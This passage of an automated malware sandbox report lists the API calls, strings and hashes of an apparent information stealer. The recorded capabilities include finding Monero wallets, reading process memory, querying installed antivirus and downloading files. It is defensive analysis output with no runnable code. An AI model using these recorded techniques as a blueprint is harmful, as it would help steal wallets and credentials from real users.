                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401F8D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                                  • API String ID: 1905561306-218353709
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c9a7f9921557c481f332da0f174eeeaaaca44ebdec2039f9a6925745ca66f22
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bda73edc0443aef9e82f0dd98887af7bd8fa38de16dcd6028e2dc442075adf6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A719F71900258AACB14EBE4DC46BEDBB79AF19304F54416EF605B31D2EB782708CBB5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040FB4B
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FB73
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FB94
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FBD0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC2B
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FC38
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FC7E
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FCCA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • N0ZWFt, xrefs: 0040FC79, 0040FC89
                                                                                                                                                                                                                                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FBE6, 0040FCE3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                                                  • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac08f08a54ba4f489be152c76e8d335287841f802f75ba7ca1997f6a51422f70
                                                                                                                                                                                                                                                                                                  • Instruction ID: 20f69977443de8948ddffc0f4a3381c49359371f896369b3d50972fa4481eb24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac08f08a54ba4f489be152c76e8d335287841f802f75ba7ca1997f6a51422f70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80612571D00208ABEB309B91DC45BEFB678AF84714F14413EF915B76C1D7BC598887A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115F0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004112EB,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000), ref: 004115F8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115F0: CharToOemW.USER32(?,00000000), ref: 00411605
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004112FD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                  • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                                                  • Instruction ID: 771bfa06b1ee6aab49511a194e20b68bd9ee86493e24a2358091a886c33ff084
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1415A71B01229ABCB24DB95DC45EEFBB78EF49B50F10411AF615A7290C678AA01CBE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,01566098,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,01572148,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,015720B8,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                  • API String ID: 1989970852-3278919252
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 2440237315-1526165396
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410E31
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00427080), ref: 00410E40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00410E62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00410E90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: :\$C
                                                                                                                                                                                                                                                                                                  • API String ID: 2389002695-3309953409
                                                                                                                                                                                                                                                                                                  • Opcode ID: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                                                  • Instruction ID: 480affee391e33356010d181296b11b1904528edf9fade7e017b84c509911b2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8741C371901218ABDB10EBE4DC05BEEBB79EF08704F10015EFA05B7281EBB85A44C7E5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405925
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,0000000B), ref: 00405951
                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405976
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405999
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004059B2
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,000000FF,0041FFE8,00000000,?,?,?,?,?,?,0000000B), ref: 004059D6
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405A00
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 00405A1C
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405A23
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405A2A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 105467990-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad3e8e31fbd1234b42d1b8aa39bbe646f14909c43cf7d3cadb2e212234b9bc59
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E51C271910308ABEB10DBA0CC86FEF7779EB05714F504169F601B72C1DB78AA08CBA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F768,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                                                  • Opcode ID: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 797b0d2c89d37aa4bb5ea973c038b2c02b127ec3880a0442df269e7358998569
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50325A74900348DFCB14DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F768,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(00000000,0155F258), ref: 004185C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F1C8), ref: 004185ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F2E8), ref: 00418606
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3C0), ref: 0041861E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3A8), ref: 00418636
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,01562EB0), ref: 0041864F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,015625C0), ref: 00418667
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,01562800), ref: 0041867F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 00418698
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F300), ref: 004186B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F438), ref: 004186C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F240), ref: 004186E1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,015627E0), ref: 004186F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3F0), ref: 00418711
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F318), ref: 0041872A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01562F00,?,00427854,?,00000000,0042738B), ref: 00418526
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418531
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001B58), ref: 0041853C
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418552
                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041856C
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041857A
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00418582
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3108587868-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
